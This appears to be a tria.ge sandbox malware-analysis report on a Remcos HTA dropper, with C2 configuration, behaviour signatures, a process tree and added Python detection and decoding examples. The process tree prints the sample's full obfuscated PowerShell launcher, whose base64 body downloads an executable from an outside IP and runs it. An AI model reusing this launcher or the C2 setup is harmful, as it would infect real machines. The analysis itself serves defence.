Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
max time kernel: 149s
max time network: 150s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 16/12/2024, 16:22
Behavioral task: behavioral1
Sample: crreatedbestthingswithgreatattitudeneedforthat.hta
Resource: win7-20240903-en
General
Target: crreatedbestthingswithgreatattitudeneedforthat.hta
Size: 142KB
MD5: 22ca9f87ffb6d9d3dc9d7e4f151470c7
SHA1: df9bcef5ab55d8a5342bb7747d7936f4fe20afe7
SHA256: 6f907156e59692c088586b695fd5aeafb27e504c18472c316c5ee73d99865470
SHA512: e4949a19b36fff2946b507911f39f587dd5db088a453292e3e24a4c4510c39e9e8d7dc3c32281b22586a5e29d46f58a68201e9ed721dead80f2fcdd96048f9a2
SSDEEP: 768:t1EiK3jK+yum2oum2U+5KUJDVUKhC14GVf/AtK36zyYnhH+K7TwTxKe+uvYcWqkO:tn
Malware Config
Extracted
Family: remcos
Botnet: elvis
C2: 107.173.4.16:2560
audio_folder: MicRecords
audio_path: ApplicationPath
audio_record_time: 5
connect_delay: 0
connect_interval: 1
copy_file: remcos.exe
copy_folder: Remcos
delete_file: false
hide_file: false
hide_keylog_file: false
install_flag: false
keylog_crypt: false
keylog_file: logs.dat
keylog_flag: false
keylog_folder: remcos
mouse_option: false
mutex: Rmc-GJDISH
screenshot_crypt: false
screenshot_flag: false
screenshot_folder: Screenshots
screenshot_path: %AppData%
screenshot_time: 10
take_screenshot_option: false
take_screenshot_time: 5
Signatures
Remcos family

Blocklisted process makes network request (1 IoC)
  flow  pid   Process
  3     2636  powershell.exe

Downloads MZ/PE file

Evasion via Device Credential Deployment (2 IoCs)
  pid   Process
  2636  powershell.exe
  2076  cmd.exe

Executes dropped EXE (1 IoC)
  pid   Process
  3028  nicetomeetyousweeet.exe

Loads dropped DLL (4 IoCs; all four loads are by the same process)
  pid   Process
  2636  powershell.exe

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery (1 TTP, 6 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  description  ioc                                                            Process
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language    csc.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language    cvtres.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language    nicetomeetyousweeet.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language    mshta.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language    cmd.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language    powershell.exe

Modifies Internet Explorer settings (1 IoC)
  description  ioc                                                                                                   Process
  Key created  \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main  mshta.exe

Suspicious behavior: EnumeratesProcesses (1 IoC)
  pid   Process
  2636  powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
  description               pid   Process
  Token: SeDebugPrivilege   2636  powershell.exe

Suspicious use of WriteProcessMemory (20 IoCs; each of the five parent-to-child writes below is recorded four times)
  description                         pid   Process          procid_target
  PID 1688 wrote to memory of 2076    1688  mshta.exe        28
  PID 2076 wrote to memory of 2636    2076  cmd.exe          30
  PID 2636 wrote to memory of 2644    2636  powershell.exe   31
  PID 2644 wrote to memory of 2080    2644  csc.exe          32
  PID 2636 wrote to memory of 3028    2636  powershell.exe   34
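The signatures above describe a chain rather than a single event: mshta.exe writes into cmd.exe, cmd.exe into powershell.exe, powershell.exe into csc.exe (the runtime C# compile behind the temp .cmdline file and the cvtres.exe child) and finally into the dropped executable under %APPDATA%. The following is an added example, not tria.ge's own detection logic: a Python check that walks process-creation events and flags each link of that chain, scoring the PowerShell flags (-Ex ByPAsS, -nop, -W 1, decode-then-Invoke-Expression) together rather than one at a time so that a plain `-File` invocation is not flagged. The event records are constructed to mirror the report's tree plus one benign control, and the rule names are mine.

```python
"""Flag the mshta -> cmd -> powershell -> csc / dropped-EXE chain in process telemetry.

Added example, not part of the tria.ge report. EVENTS is constructed to mirror the
report's process tree (same images, PIDs and flags) plus one benign control; it is
not a real Sysmon or EDR export.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the new process
    cmdline: str


# Launcher command line as it appears on the page, with a short stand-in base64 body.
PS_CMD = (
    "poWErShELL.EXE -Ex ByPAsS -nop -W 1 -c dEviceCRedeNtIaldEplOyMENt.ExE ; "
    "invokE-ExPRessiOn($(INvOke-ExPRessION('[System.tEXT.enCodinG]'+[cHaR]58+[cHaR]58"
    "+'UTf8.GeTString([SysteM.cONvERT]'+[chaR]58+[ChAr]58+'fRombAsE64stRiNG('+[CHAr]34"
    "+'QUJD'+[CHaR]0x22+'))')))"
)

EVENTS = [  # constructed
    ProcEvent(1688, 1200, r"C:\Windows\SysWOW64\mshta.exe",
              r'C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\crreatedbestthingswithgreatattitudeneedforthat.hta"'),
    ProcEvent(2076, 1688, r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\system32\cmd.exe" "/c ' + PS_CMD + '"'),
    ProcEvent(2636, 2076, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", PS_CMD),
    ProcEvent(2644, 2636, r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe",
              r'"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nwonvsm-.cmdline"'),
    ProcEvent(2080, 2644, r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe",
              r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86"),
    ProcEvent(3028, 2636, r"C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe",
              r'"C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe"'),
    # Benign control: an admin running a script file without any hiding flags.
    ProcEvent(4100, 3300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\Scripts\inventory.ps1"),
]

# PowerShell accepts unambiguous parameter prefixes, so -Ex is -ExecutionPolicy,
# -nop is -NoProfile and "-W 1" is -WindowStyle Hidden (enum value 1).
PS_FLAGS = [
    ("execpolicy_bypass", re.compile(r"-ex\w*\s+bypass", re.IGNORECASE)),
    ("noprofile", re.compile(r"-nop\w*\b", re.IGNORECASE)),
    ("hidden_window", re.compile(r"-w\w*\s+(1|h\w*)\b", re.IGNORECASE)),
    ("decode_and_iex", re.compile(r"frombase64string|invoke-expression|\biex\b", re.IGNORECASE)),
]
SCRIPT_HOSTS = {"mshta.exe", "cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
APPDATA_EXE = re.compile(r"\\appdata\\(roaming|local)\\[^\\]+\.exe$", re.IGNORECASE)


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (pid, rule) findings for every link of the chain seen in the events."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        name = _basename(e.image)
        parent = by_pid.get(e.ppid)
        pname = _basename(parent.image) if parent else ""
        # 1. HTA host spawning a shell (mshta.exe -> cmd.exe here).
        if pname == "mshta.exe" and name in ("cmd.exe", "powershell.exe", "wscript.exe"):
            findings.append((e.pid, "mshta_spawns_shell"))
        # 2. PowerShell with hiding/bypass flags AND a decode-then-IEX payload; a single
        #    flag on its own (e.g. -NoProfile) is too common to alert on.
        if name == "powershell.exe":
            hits = [tag for tag, rx in PS_FLAGS if rx.search(e.cmdline)]
            if "decode_and_iex" in hits and len(hits) >= 2:
                findings.append((e.pid, "obfuscated_ps_launcher:" + "+".join(hits)))
        # 3. PowerShell compiling C# at runtime (Add-Type -> csc.exe -> cvtres.exe).
        if name == "csc.exe" and pname == "powershell.exe":
            findings.append((e.pid, "ps_runtime_compile"))
        # 4. A script host running an executable straight out of %APPDATA%.
        if pname in SCRIPT_HOSTS and APPDATA_EXE.search(e.image):
            findings.append((e.pid, "script_host_runs_appdata_exe"))
    return findings


if __name__ == "__main__":
    for pid, rule in detect(EVENTS):
        print(pid, rule)
```

Rules 1, 3 and 4 are parent/child relationships, so they need the ppid, which is why a flat command-line grep would miss the csc.exe and dropper steps entirely; rule 2 is the only one that looks at the command line, and it normalises case because the sample randomises it.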
Processes
C:\Windows\SysWOW64\mshta.exe  (PID 1688)
    Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\crreatedbestthingswithgreatattitudeneedforthat.hta"
    - System Location Discovery: System Language Discovery
    - Modifies Internet Explorer settings
    - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\cmd.exe  (PID 2076, child of 1688)
      Command line: "C:\Windows\system32\cmd.exe" "/c poWErShELL.EXE -Ex ByPAsS -nop -W 1 -c dEviceCRedeNtIaldEplOyMENt.ExE ; invokE-ExPRessiOn($(INvOke-ExPRessION('[System.tEXT.enCodinG]'+[cHaR]58+[cHaR]58+'UTf8.GeTString([SysteM.cONvERT]'+[chaR]58+[ChAr]58+'fRombAsE64stRiNG('+[CHAr]34+'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'+[CHaR]0x22+'))')))"
      - Evasion via Device Credential Deployment
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 2636, child of 2076)
        Command line: poWErShELL.EXE -Ex ByPAsS -nop -W 1 -c dEviceCRedeNtIaldEplOyMENt.ExE ; invokE-ExPRessiOn($(INvOke-ExPRessION('[System.tEXT.enCodinG]'+[cHaR]58+[cHaR]58+'UTf8.GeTString([SysteM.cONvERT]'+[chaR]58+[ChAr]58+'fRombAsE64stRiNG('+[CHAr]34+'JGcycmogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVyRGVmaW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTFVOSEJ3eFdNS2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1KZmxJZlp1Wix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUZHhzKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtcVFzZCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpTFggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZzJyajo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3OS4xNjYvNzYvZWNvbWUuZXhlIiwiJGVuVjpBUFBEQVRBXG5pY2V0b21lZXR5b3Vzd2VlZXQuZXhlIiwwLDApO3NUYXJ0LVNMRUVwKDMpO0ludk9LZS1leHByZXNTSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUi'+[CHaR]0x22+'))')))"
        - Blocklisted process makes network request
        - Evasion via Device Credential Deployment
        - Loads dropped DLL
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

      C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe  (PID 2644, child of 2636)
          Command line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nwonvsm-.cmdline"
          - System Location Discovery: System Language Discovery
          - Suspicious use of WriteProcessMemory

        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe  (PID 2080, child of 2644)
            Command line: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES51AA.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC51A9.tmp"
            - System Location Discovery: System Language Discovery

      C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe  (PID 3028, child of 2636)
          Command line: "C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe"
          - Executes dropped EXE
          - System Location Discovery: System Language Discovery
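The PowerShell command line in the tree above hides its payload twice: the `::` and the quotes are assembled from `[char]58` and `[char]34`/`0x22` so they never appear literally, and the body is base64 in which every token is padded with long runs of spaces. The page's own base64 body decodes to an Add-Type P/Invoke declaration of urlmon!URLDownloadToFile that fetches http://192.3.179.166/76/ecome.exe into %APPDATA%\nicetomeetyousweeet.exe, sleeps three seconds and passes the path to Invoke-Expression, which is the "Executes dropped EXE" process at PID 3028. The following is an added example, not code from the report or from tria.ge: a Python decoder that rebuilds the concatenation, extracts and decodes the base64, and pulls out the download URL and drop path. The wrapper it parses is the one on the page; the base64 body is a constructed stand-in with the same shape, with a TEST-NET address in place of the real URL.

```python
"""Recover the second-stage PowerShell from the launcher in the report's process tree.

Added example, not code from the tria.ge report. The outer wrapper is the one on the
page; STAGE2_PLAIN is a constructed stand-in body with the same shape as the real one
(Add-Type P/Invoke of urlmon!URLDownloadToFile, download to %APPDATA%, run it).
"""
import base64
import re

# One PowerShell concat operand: a 'single-quoted literal' or [char]N / [char]0xN.
_TOKEN = re.compile(r"'((?:[^']|'')*)'|\[char\]\s*(0x[0-9a-f]+|\d+)", re.IGNORECASE)
_B64 = re.compile(r'FromBase64String\(\s*"([A-Za-z0-9+/=]+)"\s*\)', re.IGNORECASE)
_DOWNLOAD = re.compile(r'URLDownloadToFile\(\s*\d+\s*,\s*"([^"]+)"\s*,\s*"([^"]+)"', re.IGNORECASE)


def eval_concat(expr: str) -> str:
    """Evaluate an expression built only from string literals and [char]N joined by '+'.
    The sample uses [char]58 (':') and [char]34 / 0x22 ('"') so that '::' and the
    quotes around the base64 never appear literally in the command line."""
    parts = []
    for lit, ch in _TOKEN.findall(expr):
        parts.append(chr(int(ch, 0)) if ch else lit.replace("''", "'"))
    return "".join(parts)


def extract_stage2(cmdline: str) -> str:
    """Find the Invoke-Expression argument, rebuild it, base64-decode the body and
    collapse the long runs of spaces the author padded every token with."""
    start = cmdline.lower().find("invoke-expression(")
    if start < 0:
        raise ValueError("no Invoke-Expression in command line")
    rebuilt = eval_concat(cmdline[start:])
    m = _B64.search(rebuilt)
    if not m:
        raise ValueError("no FromBase64String payload found")
    script = base64.b64decode(m.group(1)).decode("utf-8")
    return re.sub(r"[ \t]{2,}", " ", script)


def download_iocs(script: str) -> dict:
    """Pull the fetch URL and drop path out of the decoded URLDownloadToFile call."""
    m = _DOWNLOAD.search(script)
    if not m:
        raise ValueError("no URLDownloadToFile call")
    return {"url": m.group(1), "drop_path": m.group(2)}


# Constructed stand-in body (RFC 5737 test address, not the sample's real C2 URL).
STAGE2_PLAIN = (
    "$g2rj      =      aDd-TYPE      -meMberDefiniTION      "
    "'[DllImport(\"UrlmoN.Dll\", CharSet = CharSet.Unicode)]public static extern IntPtr "
    "URLDownloadToFile(IntPtr F,string a,string b,uint c,IntPtr d);'      "
    "-nAME \"mqQsd\" -NAmESpAce iLX -PassThru;      "
    "$g2rj::URLDownloadToFile(0,\"http://192.0.2.10/76/ecome.exe\","
    "\"$enV:APPDATA\\nicetomeetyousweeet.exe\",0,0);sTart-SLEEp(3);"
    "InvOKe-expresSIon      \"$ENv:APPDATA\\nicetomeetyousweeet.exe\""
)
STAGE2_B64 = base64.b64encode(STAGE2_PLAIN.encode("utf-8")).decode("ascii")

# Launcher exactly as the report shows it, with the stand-in body spliced in.
CMDLINE = (
    "poWErShELL.EXE -Ex ByPAsS -nop -W 1 -c dEviceCRedeNtIaldEplOyMENt.ExE ; "
    "invokE-ExPRessiOn($(INvOke-ExPRessION('[System.tEXT.enCodinG]'+[cHaR]58+[cHaR]58"
    "+'UTf8.GeTString([SysteM.cONvERT]'+[chaR]58+[ChAr]58+'fRombAsE64stRiNG('+[CHAr]34+'"
    + STAGE2_B64 + "'+[CHaR]0x22+'))')))"
)

if __name__ == "__main__":
    stage2 = extract_stage2(CMDLINE)
    print(stage2)
    print(download_iocs(stage2))
```

To run it against the real launcher, replace CMDLINE with the powershell.exe command line from the tree above; the decoder does not execute anything, so it is safe to point at the live sample's string.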
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 1KB
MD5: 231bd52dc7439bba251272cae3e4d318
SHA1: 641a9acb586866345f751d5c904d5e2aac153de1
SHA256: 4a9ea347c34633b51985bc581815a85e2b031a7dc5a5c50d452faaa5f9440160
SHA512: 82fc959401195037c4a72cb1ad2c6602b08b101d70b6890db8cad16f526bcc7e7c6b31b2b78535e35ee4345ab31bcf377a561436ed1183a3f86ffbcf41d223e9

Filesize: 3KB
MD5: 5f23f7054f66283c49b88b714229dc93
SHA1: 226d34bec9d07d9ab433f120c4ab4e97d616cd77
SHA256: a560600f8d8f127957ea89bcfa198eb6c6d9236a763f68bb39269823c399a131
SHA512: ca73e9b90e6cb2c70d9c1ee8728248f38906c0bc0eb1c1221f2574cb50ffb2558e75a8e2ea3d38659fb74c29fd644523c04c677be22ed5867cb2e86ed31d160f

Filesize: 7KB
MD5: 965f859617328356306a3bf742547ffb
SHA1: 94b997dfed717a10e74ee891c0e38b6852e818e9
SHA256: 58db4bfbe05f7acd1960c1c13689078372b9af50fde24c3568b3a075df139c42
SHA512: d0ebdd2e00910a4aaea31f576266a7059947cc768eb57b3b780d0e8bba2e91d1c6f12fbb6f642cb1e6db452b049e1adab18f03163c6ac5f35b2e8bf0d324c4ec

Filesize: 652B
MD5: 3fdcc3672039aa7b981410f10cfb6cf2
SHA1: c13d238dc1ffcb42647a27aada00ee073a10f166
SHA256: d1aff747b863248fe591ad8a6c812e215622c3192312e8c248fd37e1f0f99520
SHA512: 7aa58b027843b4f28852a2c8c8f38a14d854c5cb82e0b290b638e48b3538aa6118644c59c597ea4d29f8ac0ec54619c30d2047f305eeab7a41c9017c32185dc0

Filesize: 478B
MD5: 80c03b4485808d996cc8226157f377a7
SHA1: 7cc7e02b84232b1523c555a349c86fc059a98eff
SHA256: 240b4ca770e75d02c83cb17844897b66b8c671c1477654d797146a19e0bcf12d
SHA512: ee72fd6d3ec1d6a3645c59c72a7816bcf6cf34b04683a2611eedb1897d5781c7fb92bdb1d295671b2c107a2008100e8ab1010a7401bd6c651bfed2219f15656c

Filesize: 309B
MD5: 2eb5f5af0f3121c90a4d13fcf04181a6
SHA1: a1bf83f3026d48261c366a1ed906c77e076ab7cd
SHA256: bcd172a6ba8c3bb4662fd968f97a9b40062abb79e27c8a0a5763bd7c1e2f2c3c
SHA512: 80433c3651c0314ce9fe92954cb540764ade1ad1e595595150578e9e3b511e239907744ef503421bcc18d0c4afa4ad3a650249f55731ed7bc23195743dbecd41

Filesize: 528KB
MD5: a2d03c5333bfecca62720cd6ee3a4dc4
SHA1: ce4c380f2748f375904c17b38d4f93e294fef4f6
SHA256: ef8ec5181ab4cf85a5c4867089594f40900eaafb514496905eb86314c460178e
SHA512: 5c9db8bb415da332c0adc24519ae0410a65aba932de15a682ce57efbc61b8b7d7e5e3548164909a5da5bc6966c351528626655fdbb7c21f3b4fd1974406ae04c